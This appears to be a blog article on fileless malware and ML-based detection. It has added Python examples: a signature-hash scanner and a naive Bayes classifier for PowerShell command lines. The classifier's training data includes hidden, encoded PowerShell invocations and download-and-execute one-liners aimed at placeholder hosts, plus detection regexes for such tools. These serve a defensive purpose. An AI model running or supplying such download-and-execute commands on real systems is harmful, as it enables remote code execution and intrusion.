The Fileless present of Malware and its evolving ML based detection, classification and prevention

By Ioannis Kiachidis May 28, 2024


The main approach to detecting and preventing malware is based on the concept of file signatures. More specifically, AV solutions scan the system’s storage devices and hash files when they are created and when a process is launched from them. They then compare each of these hashes against a curated database containing the signatures of known malware samples. If there is a match, the file is flagged as malicious and subsequent actions take place to contain it. But what happens if a piece of malware does not rely on a file at all to accomplish its mission?
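The mechanism described above, and the blind spot that follows from it, as an added example that is not code from the original article. It hashes every file under a directory with SHA-256 and compares the digests against a small signature set; the "known-bad" sample, the file names and the signature database are all constructed in the script itself, so nothing is fetched from a real AV feed.

```python
import hashlib
import os
import shutil
import tempfile

# Constructed sample contents; the "known-bad" body is a harmless placeholder
# and its digest is computed below, so the signature DB needs no external feed.
KNOWN_BAD = b"rem placeholder standing in for a malicious script body\r\n"
BENIGN = b"echo nightly backup complete\r\n"


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large binaries need not fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_tree(root, signatures):
    """Hash every regular file under root; return paths whose digest is known-bad."""
    flagged = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and sha256_file(path) in signatures:
                flagged.append(path)
    return sorted(flagged)


def demo():
    """Run the scanner against a temp dir, then show the fileless blind spot."""
    signatures = {sha256_bytes(KNOWN_BAD)}
    root = tempfile.mkdtemp(prefix="sigscan-")
    try:
        bad_path = os.path.join(root, "dropped.bat")
        with open(bad_path, "wb") as f:
            f.write(KNOWN_BAD)
        with open(os.path.join(root, "backup.bat"), "wb") as f:
            f.write(BENIGN)
        flagged_on_disk = [os.path.basename(p) for p in scan_tree(root, signatures)]

        # Fileless variant: the very same bytes are handed straight to a process
        # (here they only ever live in this bytes object) and never touch disk.
        os.remove(bad_path)
        in_memory_payload = KNOWN_BAD
        return {
            "flagged_on_disk": flagged_on_disk,
            # the DB does know this payload ...
            "memory_digest_in_db": sha256_bytes(in_memory_payload) in signatures,
            # ... but a storage scan has nothing left to hash
            "flagged_after_fileless": scan_tree(root, signatures),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The first scan flags `dropped.bat` because its digest is in the set; once the same bytes exist only in memory, the signature is still in the database but the scanner has no file to hash, which is exactly the gap the next paragraphs describe.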

During the last decade the cybersecurity field witnessed the rise and dominance of Fileless Malware. Fileless Malware (also known as Advanced Volatile Threat, AVT) debuted in 2001 with the Code Red worm and, according to cybersecurity enterprises and institutes, by the end of 2022 around 71% of attacks employed fileless techniques. The start of the present decade brought a surge in Fileless Malware detections of a whopping 900% as threat actors eventually came to realise its potential and efficiency. Indicative of this is the fact that APT groups and other threat actors use Fileless Malware in their operations.

In contrast to traditional malware, Fileless Malware does not download any files to the target system’s storage. Instead, the malicious code is injected directly into memory. This is usually accomplished by abusing trusted applications already present on the system (the so-called LOLBins and LOLScripts, i.e. Living-off-the-Land Binaries and Scripts) such as PowerShell, WMI and PsExec on Windows.

Since there is no file from which to generate a signature and compare it against a database of known malware signatures, AV solutions are of little to no use against Fileless Malware. Throughout the recent research literature there is a variety of proposed solutions to detect, classify and ultimately contain Fileless Malware, and most of them utilise modern Machine Learning methods and technologies. The results that some Deep Learning algorithms exhibit are promising, and thus it seems apparent that this is the direction modern solutions shall follow.
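A minimal illustration of the ML direction the two paragraphs above point to, added here and not taken from the article or from any published detector: instead of hashing files, the model classifies the command lines of the LOLBins the article names (PowerShell, WMI) from process-creation telemetry. It is a multinomial naive Bayes classifier written with the standard library only, over word tokens plus a handful of engineered indicator features. The indicator patterns, the training lines, the placeholder base64 blobs (base64 of repeated letters, not payloads) and the `.invalid` host names are all constructed assumptions for the example.

```python
import math
import re
from collections import Counter

# Engineered indicator features layered on top of plain word tokens. These
# patterns are assumptions for this example, not a published feature set;
# a production detector would derive and tune them from real telemetry.
INDICATORS = {
    "__encoded__": re.compile(r"-e(?:nc|ncodedcommand)?\b", re.I),
    "__hidden__": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "__nop__": re.compile(r"-nop(?:rofile)?\b", re.I),
    "__iex__": re.compile(r"\biex\b|invoke-expression", re.I),
    "__download__": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "__base64__": re.compile(r"[A-Za-z0-9+/=]{40,}"),
}


def featurize(cmdline):
    """Lower-cased alphanumeric tokens (2+ chars) plus any indicator flags that fire."""
    toks = [t for t in re.findall(r"[a-z0-9]+", cmdline.lower()) if len(t) >= 2]
    toks += [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return toks


class CmdlineNaiveBayes:
    """Multinomial naive Bayes with Laplace smoothing over featurize() output."""

    def __init__(self):
        self.tok_counts = {}         # label -> Counter of tokens
        self.doc_counts = Counter()  # label -> number of training lines
        self.vocab = set()

    def fit(self, samples):
        for cmdline, label in samples:
            self.doc_counts[label] += 1
            counts = self.tok_counts.setdefault(label, Counter())
            for tok in featurize(cmdline):
                counts[tok] += 1
                self.vocab.add(tok)
        return self

    def _log_score(self, label, toks):
        counts = self.tok_counts[label]
        total = sum(counts.values())
        score = math.log(self.doc_counts[label] / sum(self.doc_counts.values()))
        for tok in toks:
            if tok in self.vocab:  # tokens never seen in training carry no evidence
                score += math.log((counts[tok] + 1) / (total + len(self.vocab)))
        return score

    def log_odds(self, cmdline):
        """Positive means the line looks more like the malicious training set."""
        toks = featurize(cmdline)
        return self._log_score("malicious", toks) - self._log_score("benign", toks)

    def predict(self, cmdline):
        return "malicious" if self.log_odds(cmdline) > 0 else "benign"


# Constructed training lines (labelled by hand for the example). B64 is a
# placeholder blob, base64 of repeated "A", not an encoded command.
B64 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
TRAINING = [
    (r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1", "benign"),
    ("powershell.exe -Command Get-Service | Where-Object Status -eq Running", "benign"),
    (r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs -Recurse", "benign"),
    ("wmic.exe os get caption,version", "benign"),
    ("powershell.exe -Command Get-EventLog -LogName System -Newest 50", "benign"),
    (f"powershell.exe -NoP -W Hidden -Enc {B64}", "malicious"),
    ("powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/stage')", "malicious"),
    (f"powershell.exe -WindowStyle Hidden -EncodedCommand {B64}", "malicious"),
    ('cmd.exe /c powershell -nop -noni -w hidden -c "iex(iwr http://example.invalid/a)"',
     "malicious"),
    (f'wmic process call create "powershell -enc {B64}"', "malicious"),
]

MODEL = CmdlineNaiveBayes().fit(TRAINING)

if __name__ == "__main__":
    for line in ("powershell.exe -Command Get-Process | Sort-Object CPU -Descending",
                 "powershell.exe -NoProfile -Command Get-Date",
                 "powershell.exe -nop -w hidden -enc " + "QkJC" * 12):
        print(f"{MODEL.predict(line):9s} {MODEL.log_odds(line):+.2f}  {line[:60]}")
```

Two design points matter more than the tiny model. First, unseen tokens are skipped rather than smoothed, so a never-seen base64 blob contributes nothing on its own while the `__base64__` flag still fires; the classifier reacts to the shape of the invocation, not to a specific string, which is what a hash-based scanner cannot do. Second, a single indicator is not decisive: the `-NoProfile` admin line in the usage above is still classified benign because the rest of its tokens match the benign set, which is the point of combining evidence instead of alerting on one keyword.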